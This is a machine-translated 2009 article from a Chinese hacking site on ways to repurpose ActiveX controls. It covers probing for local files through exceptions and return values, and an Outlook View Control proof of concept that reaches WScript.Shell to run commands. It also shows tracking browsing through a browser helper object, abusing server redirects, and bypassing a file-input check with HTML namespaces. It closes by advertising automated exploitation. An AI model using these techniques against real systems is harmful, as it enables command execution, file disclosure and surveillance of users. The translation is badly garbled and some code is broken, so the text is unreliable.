Special ActiveX repurposing attacks tips and techniques-vulnerability warning-the black bar safety net

ID MYHACK58:62200925685
Type myhack58
Reporter 佚名
Modified 2009-12-21T00:00:00


Copyright (c) 2 0 0 9 Czy Invicta <Hack01@Live! cn> All rights reserved.

==> 0x00 [Foreword] ~~~~~~~~~~~~~~~~~~~ In this article, I am not against ActiveX controls the basic attack scenarios will be discussed. I'm here to be discussed is the use of a lot of interesting tricks and techniques to the development and utilization of ActiveX controls, whether you are a penetration tester workers, or the computer underground members, these tips and techniques to you at the time of the test can be used. Of course, you first must master the basic knowledge, so you're reading this article will not encounter difficulties affecting your enthusiasm degrees. Below I will going to describe and write out the example code to discuss the special case worth mastering some of the techniques. Incidentally, in order to avoid jail or losing their jobs dangerous, make sure you have in the organization or the enterprise network to perform the following technical permissions, I strongly suggest you have a print out of the license file.

==> 0x01 [exception handling: using try-catch] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Generally speaking, ActiveX controls are not compromised the local hard disk to store the files, but the ActiveX control is returned to the Internet Explorer's error messages often give an attacker useful information. In order to in JavaScript returns these exceptions, the need in the call generating the error message method or attribute of the test code to add a try-catch block. Fundamentally, these vulnerabilities exist in those named Load,Open, or*File a method or property. Basically, you want to any attempt to load or open a file of the behavior to be tested. The following is about how to build a test case of a simple example, but it is not necessarily perfect. In this example, an attacker wants to confirm whether there is a set of ActiveX controls ConfigLocation attribute of the file. If the file is successfully loaded, The code will not go into the catch section; if the file has not been loaded, The code will enter the catch section. <OBJECT id="AX" classid=CLSID:12345678-1234-1234-1234-123456789ABC> <script> try { AX. ConfigLocation = "c:\\secret.txt"; Alert("File exists!"); } catch (oException) { alert("File does not exist"); } </script> Only because the control pop-up an exception and make the code enters the catch section, this does not necessarily mean that the file does not exist. Potentially, load time many things can fail such as to cancel the cross-domain warning, these may also lead to error. However, if the controls provide the error details, the attacker can probe. When the code encounters a catch block, a different error will use different numbers to represent. This particular example tells the ConfigLocation property is how it works: 1. To obtain the file name of the value 2. 首先 检查 扩展 名 是否 为 .xml 或 .txt 3. Then check whether the file exists 4. Finally, check whether it is a valid XML file Here, there are at least 3 different locations will be wrong also because of this, return a different error number will give an attacker with important information. In order to analyze these specific information, the attacker can in their catch statement add logic to find going to be the specific exception numbers, like the following: <OBJECT id="AX" classid=CLSID:12345678-1234-1234-1234-123456789ABC> <script> try { AX. ConfigLocation = "c:\\secret.txt"; Alert("File exists!"); } catch (oException) { //The numbers used to indicate the file does not exist if (oException. number == "2 4 7 1 6 8 3 2 9 1") { alert("File does not exist"); } else { alert("File exists!"); } } </script>

I by the prompt a bit, typically if the different error events in the exception number is the same, then the anomalies of the description, or the message attribute will also be the same. But it is not always the case, it also depends on the in the code what the position of the set described.

==> 0x02 [return value] ~~~~~~~~~~~~~~~~~~~~ The programmer may have made a very good job, and has confirmed that the file exists and does not exist, can of the captured exception is not to be distinguished, but in fact there are other ways to find out whether the file really exists. Then*the Load method will return what? For example, consider the following code, it calls an OpenFile method. Suppose to try through the try-catch method and a few other use cases later, every thing looks good. <script> OpenFile("c:\\secret.txt"); </script> Research look deeper, you will learn to OpenFile value returned is a Boolean value. Interesting. When the attacker wants to use it, what will happen? <script> //Return value is true, the file exists if (OpenFile("c:\\secret.txt"); { Alert("File Exists!"); } else { Alert("File Does Not Exist"); } </script> OpenFile value returned is a Boolean value, although the use of long values or other data types also can work well, you can according to their own needs. A closer look at this example of a return value, it tells you whether the file exists.

I'm here to say a skill, that is, in addition to using try-catch and consider the return value, do not forget also to consider the event. Sometimes events trigger the number of times will also leak information. A related and more subtle problem is the timing of the attack. Even if the controls did not reveal what not to load a configuration file, but it takes the events it is possible for an attacker to know there is someone in the attempt to parse the file.

==> 0x03 [embedded object] ~~~~~~~~~~~~~~~~~~~~~~~ I love this tips: once in Internet Explorer scripting engine has an interface pointer, then its own and within it is no longer safe. This means that you can pass the security object to access the unsafe object and does not have a warning, which of course also means that the security object does not actually secure. Continue to see below I given example. Microsoft Office Outlook View control to those who want to integrate Outlook functionality with other plug-in Internet solutions provider and developer that is very useful. In this example, this control also proved to be unsafe. Example shows that an ActiveX control is what allows a Web page script access to the stronger of the COM object, and Internet Explorer to never allow scripts to create these COM objects. <object id="ViewControl" classid="clsid:0006F063-0 0 0 0-0 0 0 0-C000-0 0 0 0 0 0 0 0 0 0 3 8"> <param name="Folder" value="Inbox"> </object> <script> function DoIt() { oItem=ViewControl. object. selection. Item(1); oWSh=oItem. Session. Application. CreateObject("WScript. Shell"); oWSh. Run("cmd.exe /k echo ProofOfConcept"); } setTimeout("DoIt()",2 5 0 0); </script> How does it work? The attacker first specifies the<object>tag in a PRARM for the Inbox, because the Inbox is most likely to contain the entries of a folder. <object id="ViewControl" classid="clsid:0006F063-0 0 0 0-0 0 0 0-C000-0 0 0 0 0 0 0 0 0 0 3 8"> <param name="Folder" value="Inbox"> </object> Run the first script is the SetTimeOut("DoIt(),2 5 0 0);call it, will wait for 2. 5 seconds the attacker need this time, because sometimes Outlook takes a bit of time to come and the mail server dialogue and load the Inbox it. Then, the script call a function DoIt, the real role of content is in this function. function DoIt() { oItem=ViewControl. object. selection. Item(1); oWSh=oItem. Session. Application. CreateObject("WScript. Shell"); oWSh=Run("cmd.exe /k echo ProofOfConcept"); } Function DoIt is how it works? oItem=ViewControl. object. selection. Item(1); ViewControl. object own the positioning of the control object model, which is more than with Internet Explorer dialogue better. The latter is ignored in this case: if the referenced ViewControl. selection instead of the ViewControl. object to development of Internet Explorer for the Selection property returns the number of different content. ViewControl. object. selection is MailItem object in the collection, even if not by JavaScript directly to create, it can also be stored in a JavaScript variable.

Note: create test cases, be sure to determine what you are calling the object itself instead of the Internet Explorer Document Object Model. This point you can be in the debugger, set a breakpoint in a script, use the attached object.

Because the ViewControl. object. selection is a collection, it supports the Item method from the collection returns a single entry, so the attacker will be able to get the Inbox in the first entry and put it into oItem in Outlook collections are 1-based, which is different to the Internet Explorer collection, which is 0-based. The Outlook View control will no longer be the script engine reference. Now, the script with a conventional Outlook MailItem object. MailItem object is not secure, but because the object is by the Outlook View Control instead of Internet Explorer to create, so there will be no alarm.

I incidentally important, the controls to create the object does not belong to the Internet Explorer security model. This means that you also need to further those objects of security to be tested, even if your programmer did not write these objects. Because you control those objects as and Browser security.

oWSh=oItem. Session. Application. CreateObject("WScript. Shell"); The objects support which properties and methods? After validation, the script can be the first to get the Messaging Application Programming Interface session, and then get the main Outlook. Application object. The object has a CreateObject method, this method will be in the local system to create a COM object, Windows Script Host WScript. Shell objects can run any command is a good choice. oWSh. Run("cmd.exe /k echo ProofOfConcept"); Typically, the WScript. The Shell object is scripted, because they do not have low security settings and tips of Internet Explorer is not in the script to create this object. However, the Outlook View Control creates the Outlook. The Application object, Outlook. The Application object next, create a WScript. The Shell object. Thus, the object becomes in Internet Explorer script. How to identify these types of objects? Find able to return the object of the objects, methods and properties of the collection. In fact, I listed out the 5 types of data you want to pay close attention to: the ·IDispatch and IDispatchobject must be an object. Note that the suffix of an asterisk indicates that this type is a pointer rather than a value. ·VARIANT and VARIANTmean data type not clear, and may contain any content including the object. Note that no asterisk is of the VARIANT data type can still contain an interface pointer. ·Data types in the debugger view window to determine whether a given object. ·Data types have to be able to in Internet Explorer using alert(variable)returns[object]variable. ·Non-identification of the data type.

I will provide a trick, the VBScript TypeName function at run time returns the specified object type.

==> 0x04 [control persistence--browser help object(BHO)] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Consider the HTML page is unloaded and will not be followed to the COM component. BHO is such an Assembly of an example. They are different from ActiveX controls, because they are usually in the Internet Explorer starts or the user clicks a menu item when it is loaded, and they will be on different events such as, the positioning of the Web page and submit the form for a response. BHO has full access to the systematic manipulation of the Web browser and Web page on all the content. BHO from a web page is scripted, and they and other ActiveX controls as susceptible to re-use attack. If your control has the BHO feature, or user from the page after leaving the control remains active, then you should carefully consider the following control example, it allows any malicious user to track the victim's Internet usage.

Hint: in your test, do not put each of the ActiveX controls as a separate unit, but should think of it as a more environment part.

This feature feature ManagementWeb serverthe negotiation thread, and in Internet Explorer to open a specific page appears, the feature will be the application window shown at the bottom of consultations on the toolbar. The user can then in this toolbar using the command to increase the negotiation server, and specify what to display negotiated information, or to pre-specifyWeb serveron a particular Web page or directory. In this particular case, I include controls that have the following two interesting methods: ·Open consultations toolbar ·Set the default Conferencing Server In addition to the communication with the server mechanism have weaknesses outside of the control itself seems to be not how harmful. Once the consultation the toolbar is activated, the controls on and specify the Communication Server and in order to see whether the server has for a particular URL of the negotiation. By using the HTTP request to complete the content, wherein the HTTP request is in the URL of the page in the transfer. And the user as a query string parameter.

I then incidentally: remember that ActiveX controls and BHO is essentially a Win32 executable program. Some tools like Network Monitor and other security testing tools, helping you assess the controls of the actual behavior, its value is incalculable. Don't take it for granted that the browser to produce all of the network traffic.

So an attacker could launch toolbar, and their server is set as the default server. Then, the attacker only need to browse their network log files, you can view the victims of access to what sites. If a site in the victim log in or submit sensitive information in a query string parameter, even in the Secure Sockets Layer transport session information or other private information of the content, then for the site to be more harmful.

==> 0x05 [Server redirect] ~~~~~~~~~~~~~~~~~~~~~~~~~~~ While I'm on the Blog and did not write much Web-based test cases, but if you are a frequent visitor, then, will find that I wrote the article in the times mentioned and the use of server redirection, which can be seen this technique is so important. If your controls require the user based on the URL of the domain to determine whether a security, or submitting a URL to the user, ask permission to use a potentially insecure way to handle this URL, then you need for the server to redirect for testing. It is assumed controls only the only method LoadFromURL, this method accepts one parameter, the one used to load the URL string value. Just like the following code: <script> AX. LoadFromURL(http://www.good.example.com/goodpg.asp); </script> When this method is called, it will pop up a dialog box asking whether the user really want from the good. example. com domain to load the file. 用户 信任 good.example.com so the user of course you trust the file. Then, change the URL: <script> var sURL = "http://www.good.example.com/?redir="; sURL = "http://www.bad.example.com/badpg.asp"; AX. LoadFromURL(sURL); </script> Dialog box again POPs up asking whether the user wants from the good. example. com loading the page. 用户 信任 good.example.com so click on the OK button. Thus, the controls from the bad. example. com to load files. Why would such things happen? The redirection is completely legal, many sites have done so. In this example, good. example. com the site exists on one page, it can redirect the user to this site's other pages. This is how to work? ASP capture the redir query string request value, and publish the Response. Redirect command, it will be as you want to redirect the URL to put in the redir query string bad.example.com in happen. And then the Response. Redirect to the client to respond to a 3 0 2 The object has been moved or is similar to HTTP response, but with a requirement the client requested a new address bad.example.com in. Attacker to reuse this control and the server redirection to fool users, so that users from one he could not trust the URL of the loaded file. Some developers can use the API to automatically support redirects, so, hidden in the representation below. In fact, for the attacker's services.

==> 0x06 [bypass browser security settings] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In Internet Explorer 8, Internet Explorer has been great effort to mitigate from the Internet and local cross-site scripting attacks. In order for the present to cross-site scripting attacks implement a complete solution, the ActiveX control should also comply with the specification and can not be redirected to local content. If Internet Explorer is prohibited such redirection, your ActiveX controls are redirected to the local content, then this ActiveX control will become a may be attacker to bypass Internet Explorer security settings method. To find these vulnerabilities, it is first determined in the control to load the file or use the URL of the location. Then, try to use the ActiveX control of these elements to load local files.Finally, by looking at the behavior of the control or the use of other tools such as FileMon to evaluate your efforts. Here is how it works a brief example: <object classid="clsid:{12345678-1323-3214-3211-34514321342}" id="objBuggy"> </object> <script> //Controls in a new window, load the script specified by the URL, which you want this window handle HTML objBuggy. IsEditMode=1; //Good redirect to a local file //Note that in does not contain this ActiveX control in the IE browser using the same script will fail //Because of IE's security policy will block this behavior objBuggy. ShowHTMLWindow; </script>

==> 0x07 [namespace and behavior] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Binary behave like ActiveX controls, like work, it is bound to a specific HTML tag, and can use the tag property initialization, or by referencing the tag ID or the name of the script. Behavior has the ability to control the HTML elements of all aspects of the capture event, set value, etc. From a security perspective, binary behave like ActiveX controls. A specific ActiveX control programmers use to control the ImportList method to implement a binary behavior of potential malicious attacks were blocked. In normal usage, the controls are as<input type=file/>element of a behavior is loaded, The following code: <object classid="clsid:{BDEADE9E-C265-11d0-BCED-00A0C90AB50F}" id="LauncherObj" style="display:none;"></object> <input id="SpreadsheetFile" Type="file" Name="SpreadsheetFile" style="behavior: url(#LauncherObj);"> HTML elements<input type=file/>does not allow the script to set the value property which contains the Upload File name, otherwise a malicious Web site can also be from the user's hard drive to upload any file. Therefore, the control programmer will add a security check to determine the controls can only be bound to the Type=file HTML<input>element. Attacker how to bypass this binary behavior security mechanisms? There is no way you can make the controls through the input element directly access the file. Put another way, the attacker must trick the controls to make it thought themselves to be loaded into a input element, but is actually some other elements bound to this behavior. This is using the HTML namespace and extension implementation. In short, the name space can be added to any HTML document, the following code: <HTML XMLNS:NETSPY> In this example, the name space is NETSPY it. Through the name space the name of the preset to the tag name, namespace can be included in a particular HTML tag: <NETSPY:IMG src="http://example.com/one.jpg"> By defining an HTML namespace, the attacker deceive the space, make it think it was through<input type=file/>element to load. Then, 通过设置扩展value=c:\filename.txt an attacker can use the control to detect a local file exists, but also can detect other malicious behaviors.

==> 0x08 [epilogue] ~~~~~~~~~~~~~~~~~~~ In the article the tail, I have to remind you that the ActiveX control is very easy to be designed into automated operation. Using this, the control may be again introduced into the vulnerability of the features and functions of automatic detection. Just like I give your own tailor-made based on the Remote Authentication invasion of the automation code and more specifically, scanning, exploits and self-implantation, etc. one-stop service centre. In addition, there is doubt please send a letter to my E-Mail(Hack01[at]Live{dot}cn).

Thanks to the computer underground members of the organization C4[H]and my brother!